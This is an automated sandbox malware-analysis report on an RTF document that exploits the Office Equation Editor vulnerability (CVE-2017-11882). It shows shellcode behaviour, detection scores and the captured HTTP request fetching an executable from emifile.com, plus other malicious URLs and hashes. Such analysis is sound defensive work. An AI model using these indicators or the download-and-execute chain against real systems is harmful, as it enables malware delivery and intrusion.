
Analysis Report

Overview

General Information

Joe Sandbox Version: 23.0.0
Analysis ID: 71214
Start date: 06.08.2018
Start time: 20:44:02
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 13s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: LyTaZHwHpG (renamed file extension from none to rtf)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.expl.winRTF@4/9@3/1
EGA Information:
  • Successful, ratio: 100%
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Simulate clicks
  • Found warning dialog
  • Click Ok
  • Number of clicks 1
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 80 | 0 - 100 | Report FP / FN | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

The sample's HTTP requests all target non-existing resources (HTTP 404); the sample is likely no longer working.
The sample has a GUI, but Joe Sandbox found no clickable buttons; more UI automation may extend the observed behavior.



Signature Overview



AV Detection:

Antivirus detection for submitted file
  • Source: LyTaZHwHpG.rtf | Avira: Label: EXP/CVE-2017-11882.A
Multi AV Scanner detection for domain / URL
  • Source: http://emifile.com/frak/obai/okbimnanna.exe | virustotal: Detection: 14%
Multi AV Scanner detection for submitted file
  • Source: LyTaZHwHpG.rtf | virustotal: Detection: 68%
  • Source: LyTaZHwHpG.rtf | metadefender: Detection: 37%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Office Equation Editor has been started
  • Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
  • Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Potential downloader shellcode found
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Shellcode detected
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Potential document exploit detected (performs DNS queries)
  • Source: global traffic | DNS query: name: emifile.com
Potential document exploit detected (performs HTTP gets)
  • Source: global traffic | TCP traffic: 192.168.2.2:49163 -> 178.128.90.174:80
Potential document exploit detected (unknown TCP traffic)
  • Source: global traffic | TCP traffic: 192.168.2.2:49163 -> 178.128.90.174:80

Networking:

Domain name seen in connection with other malware
  • Source: Joe Sandbox View | Domain Name: emifile.com
Contains functionality to download and execute PE files
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Uses a known web browser user agent for HTTP communication
  • Source: global traffic | HTTP traffic detected:
      GET /frak/obai/okbimnanna.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: emifile.com
      Connection: Keep-Alive
Contains functionality to download additional files from the internet
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Downloads files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
  • Source: global traffic | HTTP traffic detected:
      GET /frak/obai/okbimnanna.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: emifile.com
      Connection: Keep-Alive
Performs DNS lookups
  • Source: unknown | DNS traffic detected: queries for: emifile.com
Posts data to webserver
  • Source: unknown | HTTP traffic detected:
      HTTP/1.1 404 Not Found
      Date: Mon, 06 Aug 2018 18:44:44 GMT
      Server: Apache/2.4.6 (CentOS) PHP/5.4.45
      X-Powered-By: PHP/5.4.45
      Set-Cookie: PHPSESSID=pnss6f6ai8njn59f4ml35u8cd0; path=/; HttpOnly
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Pragma: no-cache
      Set-Cookie: default=022d24ecdc771ed8b19a863639; path=/; httponly
      Set-Cookie: language=en-gb; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.com
      Set-Cookie: currency=MYR; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.com
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=utf-8
      Data Raw: 32 62 30 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
  • Source: global traffic | HTTP traffic detected:
      HTTP/1.1 404 Not Found
      Date: Mon, 06 Aug 2018 18:44:44 GMT
      Server: Apache/2.4.6 (CentOS) PHP/5.4.45
      X-Powered-By: PHP/5.4.45
      Set-Cookie: PHPSESSID=pnss6f6ai8njn59f4ml35u8cd0; path=/; HttpOnly
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Pragma: no-cache
      Set-Cookie: default=022d24ecdc771ed8b19a863639; path=/; httponly
      Set-Cookie: language=en-gb; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.com
      Set-Cookie: currency=MYR; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.com
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=utf-8
      Data Raw: 32 62 30 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
Urls found in memory or binary data
  • Source: WINWORD.EXE, 00000001.00000002.21436071981.012E0000.00000004.sdmp | String found in binary or memory: file:///C:
  • Source: WINWORD.EXE, 00000001.00000002.21435221695.00394000.00000004.sdmp | String found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/LyTaZHwHpG.rtf
  • Source: EQNEDT32.EXE, 00000002.00000002.21013383798.0069D000.00000004.sdmp | String found in binary or memory: http://emifile.com/frak/obai/okbimnanna.exe
  • Source: EQNEDT32.EXE, 00000002.00000002.21013342670.0066D000.00000004.sdmp | String found in binary or memory: http://emifile.com/frak/obai/okbimnanna.exe%APPDATA%
  • Source: EQNEDT32.EXE, 00000002.00000002.21013383798.0069D000.00000004.sdmp | String found in binary or memory: https://fonts.gstatic.com

System Summary:

Reads the hosts file
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Classification label
  • Source: classification engine | Classification label: mal80.expl.winRTF@4/9@3/1
Creates files inside the user directory
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$TaZHwHpG.rtf
Creates temporary files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR739B.tmp
Reads ini files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
  • Source: LyTaZHwHpG.rtf | virustotal: Detection: 68%
  • Source: LyTaZHwHpG.rtf | metadefender: Detection: 37%
Spawns processes
  • Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\LyTaZHwHpG.rtf
  • Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
  • Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Checks whether correct version of .NET is installed
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)
  • Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00672B70 push ecx; iretd 2_2_00672B72
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00672B30 push ecx; iretd 2_2_00672B32
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00672A10 push ecx; iretd 2_2_00672A12
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00672AF0 push ecx; iretd 2_2_00672AF2
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00672BD0 push ecx; iretd 2_2_00672BD2

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | System information queried: KernelDebuggerInformation
Contains functionality to read the PEB
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_006914DC mov edx, dword ptr fs:[00000030h] 2_2_006914DC

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
  • Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmp | Binary or memory string: Progman
  • Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmp | Binary or memory string: Program Manager
  • Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmp | Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
  • Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 71214 | Sample: LyTaZHwHpG | Start date: 06/08/2018 | Architecture: WINDOWS | Score: 80
[Behavior graph image not reproduced; node information recoverable from the graph text:]
  • Signatures on the sample: Multi AV Scanner detection for domain / URL; Antivirus detection for submitted file; Multi AV Scanner detection for submitted file; 3 other signatures
  • Processes started: EQNEDT32.EXE, WINWORD.EXE, EQNEDT32.EXE
  • DNS/IP contacted by EQNEDT32.EXE: emifile.com 178.128.90.174, ports 49163, 80, FORTHNET-GR ForthnetGR Greece
  • Signature on EQNEDT32.EXE: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Simulations

Behavior and APIs

Time | Type | Description
20:44:45 | API Interceptor | 1145x Sleep call for process: WINWORD.EXE modified
20:44:46 | API Interceptor | 49x Sleep call for process: EQNEDT32.EXE modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
LyTaZHwHpG.rtf | 68% | virustotal |
LyTaZHwHpG.rtf | 38% | metadefender |
LyTaZHwHpG.rtf | 100% | Avira | EXP/CVE-2017-11882.A

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
emifile.com | 4% | virustotal |

URLs

Source | Detection | Scanner | Label
http://emifile.com/frak/obai/okbimnanna.exe | 15% | virustotal |
http://emifile.com/frak/obai/okbimnanna.exe | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
emifile.com | PA78642items.doc | 00d39122fd8fbeeffe16b811c5f6293ab2719b15b39b561d3ecc9857bbb57c02 | malicious | 202.157.177.148
emifile.com | attachmen.xlsx | 2012a9863ae231283c17e698d3129d5a235d79943d1c15ea9b19b5f67eccbd0d | malicious | 202.157.177.148
emifile.com | PO 2087441006.xlsx | 47c4ed8fc69f5da1951d8753671f5d0f4535ab2d10ecf63c828b903a1e820622 | malicious | 202.157.177.148
emifile.com | PA78642items.doc | 00d39122fd8fbeeffe16b811c5f6293ab2719b15b39b561d3ecc9857bbb57c02 | malicious | 202.157.177.148
emifile.com | emifile.com/web/chak/Salman.exe | | malicious | 202.157.177.148

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
FORTHNET-GR ForthnetGR | BK.485799485.jse | 74d71096ab1b39e13c4299e7a35a9809b0825e1f9ecd13d982a07f64092f4a7a | malicious | 178.128.2.177
FORTHNET-GR ForthnetGR | https://jamiejamiename.ddns.net/o111 | | malicious | 178.128.221.116
FORTHNET-GR ForthnetGR | https://onatou.net | | malicious | 178.128.185.24
FORTHNET-GR ForthnetGR | Doc-Scan.pdf | e96b3252a14ba3d296c1a1a840e775f1001b6a9ff65480158af683d8362913e6 | malicious | 178.128.221.116
FORTHNET-GR ForthnetGR | csrss.exe | e235d52a27a59344ccf36bb7094f5b65c0675c9f15eb52bab501d5b7ece113a5 | malicious | 178.128.190.53

Dropped Files

No context

Screenshots